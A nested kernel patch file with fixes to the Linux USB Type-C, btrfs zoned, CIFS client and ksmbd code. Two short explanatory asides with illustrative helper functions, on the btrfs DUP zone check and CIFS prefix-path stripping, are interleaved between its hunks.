+ 		tcpm_pd_send_control(port, PD_CTRL_ACCEPT);
+ 		tcpm_ams_finish(port);
+ 		if (port->pwr_role == TYPEC_SOURCE) {
+@@ -4566,6 +4580,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 	case SOFT_RESET_SEND:
+ 		port->message_id = 0;
+ 		port->rx_msgid = -1;
++		/* remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
+ 		if (tcpm_pd_send_control(port, PD_CTRL_SOFT_RESET))
+ 			tcpm_set_state_cond(port, hard_reset_state(port), 0);
+ 		else
+@@ -4695,6 +4712,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 		tcpm_set_state(port, SNK_STARTUP, 0);
+ 		break;
+ 	case PR_SWAP_SNK_SRC_SINK_OFF:
++		/* will be source, remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
+ 		/*
+ 		 * Prevent vbus discharge circuit from turning on during PR_SWAP
+ 		 * as this is not a disconnect.
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 1cf8947c6d661..8cbbb002fefe0 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1205,7 +1205,7 @@ out_unlock:
+ static int ucsi_init(struct ucsi *ucsi)
+ {
+ 	struct ucsi_connector *con;
+-	u64 command;
++	u64 command, ntfy;
+ 	int ret;
+ 	int i;
+ 
+@@ -1217,8 +1217,8 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Enable basic notifications */
+-	ucsi->ntfy = UCSI_ENABLE_NTFY_CMD_COMPLETE | UCSI_ENABLE_NTFY_ERROR;
+-	command = UCSI_SET_NOTIFICATION_ENABLE | ucsi->ntfy;
++	ntfy = UCSI_ENABLE_NTFY_CMD_COMPLETE | UCSI_ENABLE_NTFY_ERROR;
++	command = UCSI_SET_NOTIFICATION_ENABLE | ntfy;
+ 	ret = ucsi_send_command(ucsi, command, NULL, 0);
+ 	if (ret < 0)
+ 		goto err_reset;
+@@ -1250,12 +1250,13 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Enable all notifications */
+-	ucsi->ntfy = UCSI_ENABLE_NTFY_ALL;
+-	command = UCSI_SET_NOTIFICATION_ENABLE | ucsi->ntfy;
++	ntfy = UCSI_ENABLE_NTFY_ALL;
++	command = UCSI_SET_NOTIFICATION_ENABLE | ntfy;
+ 	ret = ucsi_send_command(ucsi, command, NULL, 0);
+ 	if (ret < 0)
+ 		goto err_unregister;
+ 
++	ucsi->ntfy = ntfy;
+ 	return 0;
+ 
+ err_unregister:
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index ce0c8ef80c043..62206a6b8ea75 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -78,7 +78,7 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 	if (ret)
+ 		goto out_clear_bit;
+ 
+-	if (!wait_for_completion_timeout(&ua->complete, HZ))
++	if (!wait_for_completion_timeout(&ua->complete, 5 * HZ))
+ 		ret = -ETIMEDOUT;
+ 
+ out_clear_bit:
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 056f002263db5..1b72004136ef8 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -2099,11 +2099,21 @@ bool btrfs_can_activate_zone(struct btrfs_fs_devices *fs_devices, u64 flags)
+ 		if (!device->bdev)
+ 			continue;
+ 
+-		if (!zinfo->max_active_zones ||
+-		    atomic_read(&zinfo->active_zones_left)) {
++		if (!zinfo->max_active_zones) {
+ 			ret = true;
+ 			break;
+ 		}
++
++		switch (flags & BTRFS_BLOCK_GROUP_PROFILE_MASK) {
++		case 0: /* single */
++			ret = (atomic_read(&zinfo->active_zones_left) >= 1);
++			break;
++		case BTRFS_BLOCK_GROUP_DUP:
++			ret = (atomic_read(&zinfo->active_zones_left) >= 2);
++			break;
++		}
++		if (ret)
++			break;
+ 	}
+ 	mutex_unlock(&fs_info->chunk_mutex);
+ 
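
A DUP block group places two copies of every write on the same device, so activating it consumes two zones where the single profile consumes one. The check above distills to something like this (example_zones_suffice is a hypothetical reduction):

static bool example_zones_suffice(u64 flags, int active_zones_left)
{
	switch (flags & BTRFS_BLOCK_GROUP_PROFILE_MASK) {
	case 0:					/* single profile */
		return active_zones_left >= 1;
	case BTRFS_BLOCK_GROUP_DUP:		/* two copies, same device */
		return active_zones_left >= 2;
	default:				/* other profiles: not handled here */
		return false;
	}
}
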
+diff --git a/fs/cifs/cached_dir.c b/fs/cifs/cached_dir.c
+index 75d5e06306ea5..bfc964b36c72e 100644
+--- a/fs/cifs/cached_dir.c
++++ b/fs/cifs/cached_dir.c
+@@ -99,6 +99,23 @@ path_to_dentry(struct cifs_sb_info *cifs_sb, const char *path)
+ 	return dentry;
+ }
+ 
++static const char *path_no_prefix(struct cifs_sb_info *cifs_sb,
++				  const char *path)
++{
++	size_t len = 0;
++
++	if (!*path)
++		return path;
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
++	    cifs_sb->prepath) {
++		len = strlen(cifs_sb->prepath) + 1;
++		if (unlikely(len > strlen(path)))
++			return ERR_PTR(-EINVAL);
++	}
++	return path + len;
++}
++
+ /*
+  * Open and cache a directory handle.
+  * If error then *cfid is not initialized.
+@@ -125,6 +142,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	struct dentry *dentry = NULL;
+ 	struct cached_fid *cfid;
+ 	struct cached_fids *cfids;
++	const char *npath;
+ 
+ 	if (tcon == NULL || tcon->cfids == NULL || tcon->nohandlecache ||
+ 	    is_smb1_server(tcon->ses->server))
+@@ -160,6 +178,20 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		return 0;
+ 	}
+ 
++	/*
++	 * Skip any prefix paths in @path as lookup_positive_unlocked() ends up
++	 * calling ->lookup() which already adds those through
++	 * build_path_from_dentry().  Also, do it earlier as we might reconnect
++	 * below when trying to send a compounded request and then potentially
++	 * have a different prefix path (e.g. after DFS failover).
++	 */
++	npath = path_no_prefix(cifs_sb, path);
++	if (IS_ERR(npath)) {
++		rc = PTR_ERR(npath);
++		kfree(utf16_path);
++		return rc;
++	}
++
+ 	/*
+ 	 * We do not hold the lock for the open because in case
+ 	 * SMB2_open needs to reconnect.
+@@ -184,6 +216,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+@@ -251,10 +284,10 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 				(char *)&cfid->file_all_info))
+ 		cfid->file_all_info_is_valid = true;
+ 
+-	if (!path[0])
++	if (!npath[0])
+ 		dentry = dget(cifs_sb->root);
+ 	else {
+-		dentry = path_to_dentry(cifs_sb, path);
++		dentry = path_to_dentry(cifs_sb, npath);
+ 		if (IS_ERR(dentry)) {
+ 			rc = -ENOENT;
+ 			goto oshr_free;
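
For a mount that used a prefix path, the helper above turns the server-relative path back into a share-root-relative one before the dentry lookup. A hedged illustration (the literal paths are made up):

static void example_prefix_strip(struct cifs_sb_info *cifs_sb)
{
	const char *npath;

	/* assume //server/share/a/b was mounted, so prepath == "a/b" */
	npath = path_no_prefix(cifs_sb, "a/b/subdir");
	if (!IS_ERR(npath))
		pr_info("lookup uses: %s\n", npath);	/* prints "subdir" */
}
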
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+index 90850da390aeb..4952a94e5272d 100644
+--- a/fs/cifs/cifs_debug.c
++++ b/fs/cifs/cifs_debug.c
+@@ -175,7 +175,7 @@ static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+ 
+ 	seq_puts(m, "# Version:1\n");
+ 	seq_puts(m, "# Format:\n");
+-	seq_puts(m, "# <tree id> <persistent fid> <flags> <count> <pid> <uid>");
++	seq_puts(m, "# <tree id> <ses id> <persistent fid> <flags> <count> <pid> <uid>");
+ #ifdef CONFIG_CIFS_DEBUG2
+ 	seq_printf(m, " <filename> <mid>\n");
+ #else
+@@ -188,8 +188,9 @@ static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+ 				spin_lock(&tcon->open_file_lock);
+ 				list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+ 					seq_printf(m,
+-						"0x%x 0x%llx 0x%x %d %d %d %pd",
++						"0x%x 0x%llx 0x%llx 0x%x %d %d %d %pd",
+ 						tcon->tid,
++						ses->Suid,
+ 						cfile->fid.persistent_fid,
+ 						cfile->f_flags,
+ 						cfile->count,
+@@ -215,6 +216,7 @@ static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+ {
+ 	struct mid_q_entry *mid_entry;
+ 	struct TCP_Server_Info *server;
++	struct TCP_Server_Info *chan_server;
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+ 	struct cifs_server_iface *iface;
+@@ -458,23 +460,35 @@ skip_rdma:
+ 					seq_puts(m, "\t\t[CONNECTED]\n");
+ 			}
+ 			spin_unlock(&ses->iface_lock);
++
++			seq_puts(m, "\n\n\tMIDs: ");
++			spin_lock(&ses->chan_lock);
++			for (j = 0; j < ses->chan_count; j++) {
++				chan_server = ses->chans[j].server;
++				if (!chan_server)
++					continue;
++
++				if (list_empty(&chan_server->pending_mid_q))
++					continue;
++
++				seq_printf(m, "\n\tServer ConnectionId: 0x%llx",
++					   chan_server->conn_id);
++				spin_lock(&chan_server->mid_lock);
++				list_for_each_entry(mid_entry, &chan_server->pending_mid_q, qhead) {
++					seq_printf(m, "\n\t\tState: %d com: %d pid: %d cbdata: %p mid %llu",
++						   mid_entry->mid_state,
++						   le16_to_cpu(mid_entry->command),
++						   mid_entry->pid,
++						   mid_entry->callback_data,
++						   mid_entry->mid);
++				}
++				spin_unlock(&chan_server->mid_lock);
++			}
++			spin_unlock(&ses->chan_lock);
++			seq_puts(m, "\n--\n");
+ 		}
+ 		if (i == 0)
+ 			seq_printf(m, "\n\t\t[NONE]");
+-
+-		seq_puts(m, "\n\n\tMIDs: ");
+-		spin_lock(&server->mid_lock);
+-		list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
+-			seq_printf(m, "\n\tState: %d com: %d pid:"
+-					" %d cbdata: %p mid %llu\n",
+-					mid_entry->mid_state,
+-					le16_to_cpu(mid_entry->command),
+-					mid_entry->pid,
+-					mid_entry->callback_data,
+-					mid_entry->mid);
+-		}
+-		spin_unlock(&server->mid_lock);
+-		seq_printf(m, "\n--\n");
+ 	}
+ 	if (c == 0)
+ 		seq_printf(m, "\n\t[NONE]");
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+index 6094cb2ff099b..03e3e95cf25b2 100644
+--- a/fs/cifs/cifsfs.c
++++ b/fs/cifs/cifsfs.c
+@@ -730,13 +730,16 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	spin_lock(&tcon->tc_lock);
+ 	if ((tcon->tc_count > 1) || (tcon->status == TID_EXITING)) {
+ 		/* we have other mounts to same share or we have
+-		   already tried to force umount this and woken up
++		   already tried to umount this and woken up
+ 		   all waiting network requests, nothing to do */
+ 		spin_unlock(&tcon->tc_lock);
+ 		spin_unlock(&cifs_tcp_ses_lock);
+ 		return;
+-	} else if (tcon->tc_count == 1)
+-		tcon->status = TID_EXITING;
++	}
++	/*
++	 * Cannot set tcon->status to TID_EXITING yet since we don't know if umount -f will
++	 * fail later (e.g. due to open files).  TID_EXITING will be set just before the tree
++	 * disconnect (tdis) request is sent.
++	 */
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 6b8f59912f705..6c6a7fc47f3e3 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -85,13 +85,11 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 
+ 	/*
+ 	 * only tree disconnect, open, and write, (and ulogoff which does not
+-	 * have tcon) are allowed as we start force umount
++	 * have tcon) are allowed as we start umount
+ 	 */
+ 	spin_lock(&tcon->tc_lock);
+ 	if (tcon->status == TID_EXITING) {
+-		if (smb_command != SMB_COM_WRITE_ANDX &&
+-		    smb_command != SMB_COM_OPEN_ANDX &&
+-		    smb_command != SMB_COM_TREE_DISCONNECT) {
++		if (smb_command != SMB_COM_TREE_DISCONNECT) {
+ 			spin_unlock(&tcon->tc_lock);
+ 			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+ 				 smb_command);
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 0006b1ca02036..7aecb1646b6fc 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -1774,7 +1774,7 @@ out_err:
+ 	return ERR_PTR(rc);
+ }
+ 
+-/* this function must be called with ses_lock held */
++/* this function must be called with ses_lock and chan_lock held */
+ static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ {
+ 	if (ctx->sectype != Unspecified &&
+@@ -1785,12 +1785,8 @@ static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	 * If an existing session is limited to less channels than
+ 	 * requested, it should not be reused
+ 	 */
+-	spin_lock(&ses->chan_lock);
+-	if (ses->chan_max < ctx->max_channels) {
+-		spin_unlock(&ses->chan_lock);
++	if (ses->chan_max < ctx->max_channels)
+ 		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+ 
+ 	switch (ses->sectype) {
+ 	case Kerberos:
+@@ -1918,10 +1914,13 @@ cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 			spin_unlock(&ses->ses_lock);
+ 			continue;
+ 		}
++		spin_lock(&ses->chan_lock);
+ 		if (!match_session(ses, ctx)) {
++			spin_unlock(&ses->chan_lock);
+ 			spin_unlock(&ses->ses_lock);
+ 			continue;
+ 		}
++		spin_unlock(&ses->chan_lock);
+ 		spin_unlock(&ses->ses_lock);
+ 
+ 		++ses->ses_count;
+@@ -2365,6 +2364,7 @@ cifs_put_tcon(struct cifs_tcon *tcon)
+ 	WARN_ON(tcon->tc_count < 0);
+ 
+ 	list_del_init(&tcon->tcon_list);
++	tcon->status = TID_EXITING;
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+@@ -2741,6 +2741,7 @@ cifs_match_super(struct super_block *sb, void *data)
+ 
+ 	spin_lock(&tcp_srv->srv_lock);
+ 	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
+ 	spin_lock(&tcon->tc_lock);
+ 	if (!match_server(tcp_srv, ctx) ||
+ 	    !match_session(ses, ctx) ||
+@@ -2753,6 +2754,7 @@ cifs_match_super(struct super_block *sb, void *data)
+ 	rc = compare_mount_options(sb, mnt_data);
+ out:
+ 	spin_unlock(&tcon->tc_lock);
++	spin_unlock(&ses->chan_lock);
+ 	spin_unlock(&ses->ses_lock);
+ 	spin_unlock(&tcp_srv->srv_lock);
+ 
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+index bbaee4c2281f8..a268896d05d57 100644
+--- a/fs/cifs/fs_context.h
++++ b/fs/cifs/fs_context.h
+@@ -286,5 +286,5 @@ extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
+  * max deferred close timeout (jiffies) - 2^30
+  */
+ #define SMB3_MAX_DCLOSETIMEO (1 << 30)
+-#define SMB3_DEF_DCLOSETIMEO (5 * HZ) /* Can increase later, other clients use larger */
++#define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec enough to help eg open/write/close/open/read */
+ #endif
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+index d937eedd74fb6..c0f101fc1e5d0 100644
+--- a/fs/cifs/link.c
++++ b/fs/cifs/link.c
+@@ -360,6 +360,7 @@ smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
++		.path = path,
+ 		.desired_access = GENERIC_READ,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+ 		.disposition = FILE_OPEN,
+@@ -427,6 +428,7 @@ smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
++		.path = path,
+ 		.desired_access = GENERIC_WRITE,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+ 		.disposition = FILE_CREATE,
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 7a2862c10afbd..c97e049e29dd3 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -106,6 +106,7 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	vars->oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = desired_access,
+ 		.disposition = create_disposition,
+ 		.create_options = cifs_create_options(cifs_sb, create_options),
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 0424876d22e5a..ccf311750927b 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -530,6 +530,14 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 	p = buf;
+ 
+ 	spin_lock(&ses->iface_lock);
++	/* do not query too frequently, this time with lock held */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ))) {
++		spin_unlock(&ses->iface_lock);
++		return 0;
++	}
++
+ 	/*
+ 	 * Go through iface_list and do kref_put to remove
+ 	 * any unused ifaces. ifaces in use will be removed
+@@ -696,6 +704,12 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	struct network_interface_info_ioctl_rsp *out_buf = NULL;
+ 	struct cifs_ses *ses = tcon->ses;
+ 
++	/* do not query too frequently */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ)))
++		return 0;
++
+ 	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
+ 			FSCTL_QUERY_NETWORK_INTERFACE_INFO,
+ 			NULL /* no data input */, 0 /* no data input */,
+@@ -703,7 +717,7 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	if (rc == -EOPNOTSUPP) {
+ 		cifs_dbg(FYI,
+ 			 "server does not support query network interfaces\n");
+-		goto out;
++		ret_data_len = 0;
+ 	} else if (rc != 0) {
+ 		cifs_tcon_dbg(VFS, "error %d on ioctl to get interface list\n", rc);
+ 		goto out;
+@@ -731,6 +745,7 @@ smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -774,6 +789,7 @@ smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -821,6 +837,7 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -1105,6 +1122,7 @@ smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_WRITE_EA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2096,6 +2114,7 @@ smb3_notify(const unsigned int xid, struct file *pfile,
+ 	tcon = cifs_sb_master_tcon(cifs_sb);
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2168,6 +2187,7 @@ smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2500,6 +2520,7 @@ smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = desired_access,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2634,6 +2655,7 @@ smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2928,6 +2950,7 @@ smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, create_options),
+@@ -3068,6 +3091,7 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
+@@ -3208,6 +3232,7 @@ get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = READ_CONTROL,
+ 		.disposition = FILE_OPEN,
+ 		/*
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 23926f754d2aa..6e6e44d8b4c79 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -225,13 +225,9 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	spin_lock(&tcon->tc_lock);
+ 	if (tcon->status == TID_EXITING) {
+ 		/*
+-		 * only tree disconnect, open, and write,
+-		 * (and ulogoff which does not have tcon)
+-		 * are allowed as we start force umount.
++		 * Only tree disconnect is allowed while umounting.
+ 		 */
+-		if ((smb2_command != SMB2_WRITE) &&
+-		   (smb2_command != SMB2_CREATE) &&
+-		   (smb2_command != SMB2_TREE_DISCONNECT)) {
++		if (smb2_command != SMB2_TREE_DISCONNECT) {
+ 			spin_unlock(&tcon->tc_lock);
+ 			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+ 				 smb2_command);
+@@ -2746,7 +2742,7 @@ int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
+ 	rqst.rq_nvec = n_iov;
+ 
+ 	/* no need to inc num_remote_opens because we close it just below */
+-	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, CREATE_NOT_FILE,
++	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, full_path, CREATE_NOT_FILE,
+ 				    FILE_WRITE_ATTRIBUTES);
+ 	/* resource #4: response buffer */
+ 	rc = cifs_send_recv(xid, ses, server,
+@@ -3014,7 +3010,7 @@ SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms, __le16 *path,
+ 	if (rc)
+ 		goto creat_exit;
+ 
+-	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid,
++	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid, oparms->path,
+ 		oparms->create_options, oparms->desired_access);
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+diff --git a/fs/cifs/trace.h b/fs/cifs/trace.h
+index 110070ba8b04e..d3053bd8ae731 100644
+--- a/fs/cifs/trace.h
++++ b/fs/cifs/trace.h
+@@ -701,13 +701,15 @@ DECLARE_EVENT_CLASS(smb3_open_enter_class,
+ 	TP_PROTO(unsigned int xid,
+ 		__u32	tid,
+ 		__u64	sesid,
++		const char *full_path,
+ 		int	create_options,
+ 		int	desired_access),
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access),
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access),
+ 	TP_STRUCT__entry(
+ 		__field(unsigned int, xid)
+ 		__field(__u32, tid)
+ 		__field(__u64, sesid)
++		__string(path, full_path)
+ 		__field(int, create_options)
+ 		__field(int, desired_access)
+ 	),
+@@ -715,11 +717,12 @@ DECLARE_EVENT_CLASS(smb3_open_enter_class,
+ 		__entry->xid = xid;
+ 		__entry->tid = tid;
+ 		__entry->sesid = sesid;
++		__assign_str(path, full_path);
+ 		__entry->create_options = create_options;
+ 		__entry->desired_access = desired_access;
+ 	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x cr_opts=0x%x des_access=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid,
++	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s cr_opts=0x%x des_access=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __get_str(path),
+ 		__entry->create_options, __entry->desired_access)
+ )
+ 
+@@ -728,9 +731,10 @@ DEFINE_EVENT(smb3_open_enter_class, smb3_##name,  \
+ 	TP_PROTO(unsigned int xid,		\
+ 		__u32	tid,			\
+ 		__u64	sesid,			\
++		const char *full_path,		\
+ 		int	create_options,		\
+ 		int	desired_access),	\
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access))
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access))
+ 
+ DEFINE_SMB3_OPEN_ENTER_EVENT(open_enter);
+ DEFINE_SMB3_OPEN_ENTER_EVENT(posix_mkdir_enter);
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+index 6e61b5bc7d86e..cead696b656a8 100644
+--- a/fs/ksmbd/auth.c
++++ b/fs/ksmbd/auth.c
+@@ -727,8 +727,9 @@ static int generate_key(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 		goto smb3signkey_ret;
+ 	}
+ 
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++	if (key_size == SMB3_ENC_DEC_KEY_SIZE &&
++	    (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
++	     conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+ 		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L256, 4);
+ 	else
+ 		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L128, 4);
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index 56be077e5d8ac..2be9d7460494b 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -298,7 +298,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		kvfree(conn->request_buf);
+ 		conn->request_buf = NULL;
+ 
+-		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf));
++		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf), -1);
+ 		if (size != sizeof(hdr_buf))
+ 			break;
+ 
+@@ -319,13 +319,10 @@ int ksmbd_conn_handler_loop(void *p)
+ 		}
+ 
+ 		/*
+-		 * Check if pdu size is valid (min : smb header size,
+-		 * max : 0x00FFFFFF).
++		 * Check maximum pdu size (0x00FFFFFF).
+ 		 */
+-		if (pdu_size < __SMB2_HEADER_STRUCTURE_SIZE ||
+-		    pdu_size > MAX_STREAM_PROT_LEN) {
++		if (pdu_size > MAX_STREAM_PROT_LEN)
+ 			break;
+-		}
+ 
+ 		/* 4 for rfc1002 length field */
+ 		size = pdu_size + 4;
+@@ -344,7 +341,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		 * We already read 4 bytes to find out PDU size, now
+ 		 * read in PDU
+ 		 */
+-		size = t->ops->read(t, conn->request_buf + 4, pdu_size);
++		size = t->ops->read(t, conn->request_buf + 4, pdu_size, 2);
+ 		if (size < 0) {
+ 			pr_err("sock_read failed: %d\n", size);
+ 			break;
+diff --git a/fs/ksmbd/connection.h b/fs/ksmbd/connection.h
+index 3643354a3fa79..0e3a848defaf3 100644
